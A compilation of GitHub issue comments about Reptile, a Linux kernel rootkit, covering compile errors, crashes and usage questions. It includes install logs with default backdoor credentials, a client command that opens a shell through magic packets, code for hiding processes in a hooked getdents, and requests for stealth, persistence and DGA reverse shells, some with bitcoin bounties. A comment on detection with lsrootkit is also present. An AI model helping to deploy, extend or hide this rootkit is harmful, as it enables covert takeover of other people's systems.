The TCP and UDP knocking in heaven's door is not working for Centos6 box. Only ICMP knocking works. Could you check what the issue might be? Sebd rootkit raw sockets works for Centos6.

use copy_to_user/copy_from_user, not __-versions

Hi, Im a gay ... :)
so, when launch ./installer.sh remove I get this
Uninstalling... rmmod: ERROR: Module rep_mod is in use

Another Info:
On 4.15.0-kali3-amd64
lsmod | grep rep_mod
rep_mod 20480 1

/sbin/modinfo reptile
filename: /lib/modules/4.15.0-kali3-amd64/kernel/drivers/PulseAudio/reptile/reptile.ko
description: Reptile - A linux LKM rootkit
author: F0rb1dd3n - [email protected]
license: GPL
depends:
retpoline: Y
name: rep_mod
vermagic: 4.15.0-kali3-amd64 SMP mod_unload modversions

rmmod /lib/modules/4.15.0-kali3-amd64/kernel/drivers/PulseAudio/reptile/reptile.ko
rmmod: ERROR: Module reptile is not currently loaded

How to uninstall please ?

[test@test ~]$ lsof -i -n -P
lsof: WARNING: unsupported format: /proc/net/tcp
COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME
systemd-n 448 systemd-network 19u IPv4 15693 0t0 UDP 192.168.1.112:68
systemd-r 460 systemd-resolve 12u IPv4 16107 0t0 UDP 127.0.0.53:53
sshd 540 root 4u IPv6 17935 0t0 TCP *:22 (LISTEN)

Tested on Ubuntu 18.04.1 and Debian 9.

uname -a
Linux root 2.6.32-431.el6.x86_64 #1 SMP Fri Nov 22 03:15:09 UTC 2013 x86_64 x86_64 x86_64 GNU/Linux
Compiling Error
`############################################################################
############################ REPTILE INSTALLER #############################
############################################################################
written by: F0rb1dd3n
SELinux config found on system!
Checking SELinux status... clear

Hide name (will be used to hide dirs/files) (default: reptile):
Auth token to port-knocking (default: hax0r):
Backdoor password (default: s3cr3t):
Tag name that hide file contents (default: reptile):
Source port to port-knocking (default: 666):
TCP port to port-knocking (default: 80):
UPD port to port-knocking (default: 53):

Hide name: reptile
Token: hax0r
Backdoor password: s3cr3t
SRC port: 666
TCP port: 80
UDP port: 53
TAGs to hide file contents:

#
content to be hidden
#

Configuring... DONE!
Compiling... ERROR!
`

reptile-client> set PORT TCP=1
[-] wrong parameter!
How to set PORT ?

I would love to see these features implemented soon:

Hide CPU usage for specified processes : bounty 0.2btc
Hide iptables rules via netfilter hooks - bounty 0.1btc
Execute command at specified time directly via module (not using third party apps like cron) - bounty 0.1btc

Let me know if you are willing to work on this and i will forward my onion contact info.

rcu_read_lock()
for_each_process() { ... }
rcu_read_unlock()

Or:

read_lock(&tasklist_lock)
for_each_process() { ... }
read_unlock(&tasklist_lock)

Also get_task_struct() required for returning tasks.

See get_pid_task

Hello, I'm not sure if I'm supposed to install the rootkit on both the client and the server, or whether this is something that you catch over netcat.

So, to install on this Centos you just need to run ./setup.sh install. But before you will have to install String::Unescape perl module.

To do that, normally is just do this command or even cpan -i String::Unescape. But if you are having problem with that, you will have to check your perl. Maybe in some configurations, perl is not fully installed.

Try to install (or even reinstall) perl and cpan in your system: yum install perl-devel cpan

Is also recommended: yum update

Originally posted by @f0rb1dd3n in #54 (comment)

You have a nice project, and judging by the stars it has, you should be very proud.
However, I propose the complete removal of this line from the setup.sh.

It's very much offensive and without adding any value to your project. Don't you agree?

(está dando bobeira aí amigão, de graça).

rt

I like feature of the previous version which you only need to set ip and lport. Input everything in a single run seems to be complicated.

Hi, thank you for this great project! As I read in other topic, it works only in internal network, but I really need it to use with my vps. How I can setup it to work through NAT? Anyone has experience about that? There is no problem with listener, but server can’t connect to me.

P.s ./reverse works fine. Probably something with magic packet, maybe I used it wrong? I run a web server on my vps, it’s possible to send a packet to Apache and trigger reverse connection?

Hey, great work! thank you!
But how to unhide content inside tags after it's been inserted?

# make
mkdir -p bin
cd sbin && make all
make[1]: Entering directory '/home/user/Desktop/Projects/Reptile/sbin'
gcc -O -W -Wall -o client  pel.c aes.c sha1.c client.c
client.c: In function ‘p_error’:
client.c:48:4: warning: ‘strncat’ specified bound 7 equals source length [-Wstringop-overflow=]
    strncat(error_message, " Error ", 7);
    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
gcc -O -W -Wall -o shell pel.c aes.c sha1.c shell.c -lutil -DLINUX
gcc -Wall r00t.c -o r00t
strip client shell r00t
cp client shell r00t ../bin
make[1]: Leaving directory '/home/user/Desktop/Projects/Reptile/sbin'
make EXTRA_CFLAGS="-Dx86_64" -C /lib/modules/4.17.0-1-ARCH/build M=/home/user/Desktop/Projects/Reptile modules
make[1]: Entering directory '/usr/lib/modules/4.17.0-1-ARCH/build'
  CC [M]  /home/user/Desktop/Projects/Reptile/rep_mod.o
/home/user/Desktop/Projects/Reptile/rep_mod.c: In function ‘generic_find_sys_call_table’:
/home/user/Desktop/Projects/Reptile/rep_mod.c:397:51: error: ‘sys_close’ undeclared (first use in this function); did you mean ‘ksys_close’?
   if (syscall_table[__NR_close] == (unsigned long)sys_close)
                                                   ^~~~~~~~~
                                                   ksys_close
/home/user/Desktop/Projects/Reptile/rep_mod.c:397:51: note: each undeclared identifier is reported only once for each function it appears in
make[2]: *** [scripts/Makefile.build:319: /home/user/Desktop/Projects/Reptile/rep_mod.o] Error 1
make[1]: *** [Makefile:1572: _module_/home/user/Desktop/Projects/Reptile] Error 2
make[1]: Leaving directory '/usr/lib/modules/4.17.0-1-ARCH/build'
make: *** [Makefile:7: all] Error 2

Also, from my testing, syscall hooking no longer works in 4.17 so finding a way around that will be fun. Tested the same basic directory hiding code that worked on 4.16.13 on 4.17 and it no longer works.

Hi,

Could you add another feature to this rootkit so that it can hide its packets from tools like wireshark/tcpdump?

Tested on CentOS 6 x64 (using all the default setting)

1. set the port-knocking auth token as "hax0r"
   use the client as:
   ./reptile_client -l 127.0.0.1 -t 127.0.0.1 -p 5555 -x icmp -k hax0r -w s3cr3t then you will get a shell
   but
   ./reptile_client -l 127.0.0.1 -t 127.0.0.1 -p 5555 -x icmp -k hax0r123 -w s3cr3t then you can still get a shell
   if you try that
   ./reptile_client -l 127.0.0.1 -t 127.0.0.1 -p 5555 -x icmp -k hax0rasuhuicsashai155 -w s3cr3t (right Auth token +some random chars ) the system will crash.
   2.if you set the auth token a bit longer than "hax0r" ,such as "hax0rchsausau" then the port-knocking will not working.
   3.if you set the Hide name a bit longer than "reptile",the port-knocking will not working.

Reptile may have chance to Crash a RHEL6 using all the default setting,sorry a forgot to log the error code.
Good luck!

I have an application which processes I can hide with reptile. But it also loads a module which can be found with lsmod and likely other commands. Is there some way to hide the module with reptile?

Hi, did you want to add my blog post to your list of references?
https://www.google.com.au/search?q="unsigned+int+magic_packet_hook"

Thanks.

Hello,
I was testing the new remote backdoor (it's very nice) when I encountered this kernel crash (it happens quite quickly after using the remote backdoor). I was using Ubuntu 16.04.4 server (on virtualbox) for testing. Similiar crash also happened on Ubuntu 18.04 server.
Details: crash.txt

data = (char *)((unsigned char *)icmp_header + sizeof(struct icmphdr));
data = (char *)((unsigned char *)tcp_header + sizeof(struct tcphdr));
data = (char *)((unsigned char *)udp_header + sizeof(struct udphdr));

skb_header_pointer() must be used along with local on-stack copy of skb->data portion...

See the example:
https://elixir.bootlin.com/linux/latest/source/net/bridge/netfilter/ebt_ip.c#L36

Thanks for your nice work!
I still can't understand how to use the Hiding Files Function.
In readme:
Hide/unhide files contents: kill -51 0 and all content between the tags will be hidden
#
content to hide
#

what i did(use all default setting) :
[root@TEST ~]# cd Reptile
[root@TEST Reptile]# ls
installer.sh libpcap-1.5.3.tar.gz README.md sbin
libpcap-1.5.3 Makefile rep_mod.c scripts
[root@TEST Reptile]# # /root/Reptile/README.md #
[root@TEST Reptile]# kill -51 0
[root@TEST Reptile]# kill -51 0 # /root/Reptile/README.md #
[root@TEST Reptile]# ls
installer.sh libpcap-1.5.3.tar.gz README.md sbin
libpcap-1.5.3 Makefile rep_mod.c scripts
[root@TEST Reptile]# #
[root@TEST Reptile]# /root/Reptile/README.md
-bash: /root/Reptile/README.md: Permission denied
[root@TEST Reptile]# #
[root@TEST Reptile]# ls
installer.sh libpcap-1.5.3.tar.gz README.md sbin
libpcap-1.5.3 Makefile rep_mod.c scripts
[root@TEST Reptile]#

i just dont't know how to hide the file /root/Reptile/README.md.

I get a crash after unloading module looks like memory corruption
"BUG: unable to handle kernel paging request at ffffffffc06e69bb"
It has something to do with file content hiding feature it doesn't crash after commenting all related functions
this is on CentOS 7 3.10.0-693.5.2.el7.x86_64

hi, any idea how to fix this problem?

root@test2:/opt/Reptile # ./setup.sh install

############################################################################
############################ REPTILE INSTALLER #############################
############################################################################
written by: F0rb1dd3n

SELinux config found on system!
Checking SELinux status... clear

Hide name (will be used to hide dirs/files) (default: reptile):
Auth token to magic packets (default: hax0r):
Backdoor password (default: s3cr3t):
Tag name that hide file contents (default: reptile):
Source port of magic packets (default: 666):
Would you like to config reverse shell each X time? (y/n) (default: n):

Token: hax0r
Backdoor password: s3cr3t
SRC port: 666

TAGs to hide file contents:

#
content to be hidden
#

Configuring... DONE!
Compiling... mkdir -p bin
cd sbin && make reverse cmd
make[1]: Entering directory '/opt/Reptile/sbin'
make[1]: 'reverse' is up to date.
make[1]: 'cmd' is up to date.
make[1]: Leaving directory '/opt/Reptile/sbin'
make -C /lib/modules/4.11.5-200.fc25.x86_64/build M=$PWD
make[1]: *** /lib/modules/4.11.5-200.fc25.x86_64/build: No such file or directory. Stop.
Makefile:2: recipe for target 'all' failed
make: *** [all] Error 2
ERROR!

root@test2:/opt/Reptile # yum install kernel-devel
Redirecting to '/usr/bin/dnf install kernel-devel' (see 'man yum2dnf')

Last metadata expiration check: 2:48:28 ago on Thu Dec 6 15:20:15 2018.
Package kernel-devel-4.13.16-100.fc25.x86_64 is already installed, skipping.
Dependencies resolved.
Nothing to do.
Complete!
root@test2:/opt/Reptile # ls -al /lib/modules/4.11.5-200.fc25.x86_64/
total 14380
drwxr-xr-x. 5 root root 4096 Jun 20 2017 .
drwxr-xr-x. 5 root root 4096 Dec 6 18:04 ..
lrwxrwxrwx. 1 root root 39 Jun 14 2017 build -> /usr/src/kernels/4.11.5-200.fc25.x86_64
-rw-r--r--. 1 root root 185270 Jun 14 2017 config
drwxr-xr-x. 13 root root 4096 Jun 20 2017 kernel
-rw-r--r--. 1 root root 974994 Jun 20 2017 modules.alias
-rw-r--r--. 1 root root 955399 Jun 20 2017 modules.alias.bin
-rw-r--r--. 1 root root 1804 Jun 14 2017 modules.block
-rw-r--r--. 1 root root 7554 Jun 14 2017 modules.builtin
-rw-r--r--. 1 root root 9974 Jun 20 2017 modules.builtin.bin
-rw-r--r--. 1 root root 334323 Jun 20 2017 modules.dep
-rw-r--r--. 1 root root 472573 Jun 20 2017 modules.dep.bin
-rw-r--r--. 1 root root 331 Jun 20 2017 modules.devname
-rw-r--r--. 1 root root 153 Jun 14 2017 modules.drm
-rw-r--r--. 1 root root 110 Jun 14 2017 modules.modesetting
-rw-r--r--. 1 root root 2701 Jun 14 2017 modules.networking
-rw-r--r--. 1 root root 126788 Jun 14 2017 modules.order
-rw-r--r--. 1 root root 486 Jun 20 2017 modules.softdep
-rw-r--r--. 1 root root 403343 Jun 20 2017 modules.symbols
-rw-r--r--. 1 root root 493901 Jun 20 2017 modules.symbols.bin
lrwxrwxrwx. 1 root root 5 Jun 14 2017 source -> build
-rw-------. 1 root root 3550927 Jun 14 2017 System.map
drwxr-xr-x. 2 root root 4096 Jun 14 2017 updates
drwxr-xr-x. 2 root root 4096 Jun 20 2017 vdso
-rwxr-xr-x. 1 root root 7137256 Jun 14 2017 vmlinuz
-rw-r--r--. 1 root root 167 Jun 14 2017 .vmlinuz.hmac
root@test2:/opt/Reptile # uname -a
Linux test2 4.11.5-200.fc25.x86_64 #1 SMP Wed Jun 14 17:17:29 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
root@test2:/opt/Reptile # cat /proc/version
Linux version 4.11.5-200.fc25.x86_64 ([email protected]) (gcc version 6.3.1 20161221 (Red Hat 6.3.1-1) (GCC) ) #1 SMP Wed Jun 14 17:17:29 UTC 2017
root@test2:/opt/Reptile # cat /etc/fedora-release
Fedora release 25 (Twenty Five)

This is a great design, I want to learn it.Can you tell me how to use it in centos7? Thank you! My kernel is centos7 3.10.0-693.el7.x86_64.What should I do?

i use centos 7 for compile the rootkit but i have this error:

Configuring... Can't locate String/Unescape.pm in @INC (@INC contains: /usr/local/lib64/perl5 /usr/local/share/perl5 /usr/lib64/perl5/vendor_perl /usr/share/perl5/vendor_perl /usr/lib64/perl5 /usr/share/perl5 .) at scripts/destringify.pl line 8.
BEGIN failed--compilation aborted at scripts/destringify.pl line 8.
Can't locate String/Unescape.pm in @INC (@INC contains: /usr/local/lib64/perl5 /usr/local/share/perl5 /usr/lib64/perl5/vendor_perl /usr/share/perl5/vendor_perl /usr/lib64/perl5 /usr/share/perl5 .) at scripts/destringify.pl line 8.
BEGIN failed--compilation aborted at scripts/destringify.pl line 8.
DONE!
Compiling... ERROR!

lsrootkit detects Reptile with a simple GID bruteforcing.

https://github.com/David-Reguera-Garcia-Dreg/lsrootkit

Hello,
Hiding from these commands would be a nice feature.

use copy_to_user/copy_from_user, not __-versions

Hey there, the r00t.c code can be shortened without losing functionality - not sure if that's your style, but I opened a pull request in #5

Also I found some typos and fixed them. By the way, really neat tool you wrote there 👍

Hi,
Thanks for the beta version. I tried to compile it on Ubuntu 18.04.1 (64 bit) but I got following error:
: In function 'runshell':
:118:2: warning: ignoring return value of 'chdir', declared with attribute warn_unused_result [-Wunused-result]
/tmp/ccsXzAOl.o: In function runshell': :(.text+0x267): undefined reference to openpty'
collect2: error: ld returned 1 exit status
Makefile:12: recipe for target 'reverse' failed
make[1]: *** [reverse] Error 1
make[1]: Leaving directory '/home/test/Reptile/sbin'
Makefile:2: recipe for target 'all' failed
make: *** [all] Error 2

I test on centos that The driver mod don't load when system reboot

use _dt[sizeof(TOKEN)] while declaring

Hi,

I'm trying to add a hardcoded predefined hidden process name

I'm trying this but It doesn't work

#include <linux/string.h>
static const char* phpn = "process";

in both getdents getdents64:

while(off < ret) {
	dir = (void *)kdir + off;
	if((!p && (memcmp(HIDE, dir->d_name, strlen(HIDE)) == 0)) 
            || (p && is_invisible(simple_strtoul(dir->d_name, NULL, 10)))) 

            /* Predefined process check  */
            || (p && (strncmp(dir->d_name, phpn, strlen(phpn)) == 0))

            {
		if(dir == kdir) {
			ret -= dir->d_reclen;
			memmove(dir, (void *)dir + dir->d_reclen, ret);
			continue;
		}
		prev->d_reclen += dir->d_reclen;
	} else {
		prev = dir;
	}
	off += dir->d_reclen;
}
if(copy_to_user(dirent, kdir, ret))

kfree(kdir);
return ret;
}

I was going to add a signal switch next to enable and disable the hiding of predefined process(es)

After execute apt-get install linux-headers-$(uname -r),it shows

Reading package lists... Done
Building dependency tree
Reading state information... Done
linux-headers-4.4.0-116-generic is already the newest version (4.4.0-116.140).
0 upgraded, 0 newly installed, 0 to remove and 158 not upgraded.

then I execute ./installer.sh install,it shows

############################################################################
############################ REPTILE INSTALLER #############################
############################################################################
writen by: F0rb1dd3n

Compiling... DONE!
Copying binaries to /reptile... DONE!
Installing... insmod: ERROR: could not insert module /reptile/reptile.ko: Invalid module format
ERROR!

Additional information about the system:
Linux version 4.4.0-116-generic (buildd@lgw01-amd64-021) (gcc version 5.4.0 20160609 (Ubuntu 5.4.0-6ubuntu1~16.04.9) ) #140-Ubuntu SMP Mon Feb 12 21:23:04 UTC 2018

Add a reverse-root-shell (each X time) - with certificate - using a DGA and/or IP/DOMAIN.

watching some projects I found this. It would be interesting and helpful to be able to add utility "poison runlevel" for persistence.

https://github.com/powerofkernel/poisonRunlevel-v3

Linus un-exported vfs_read preventing use on 4.14+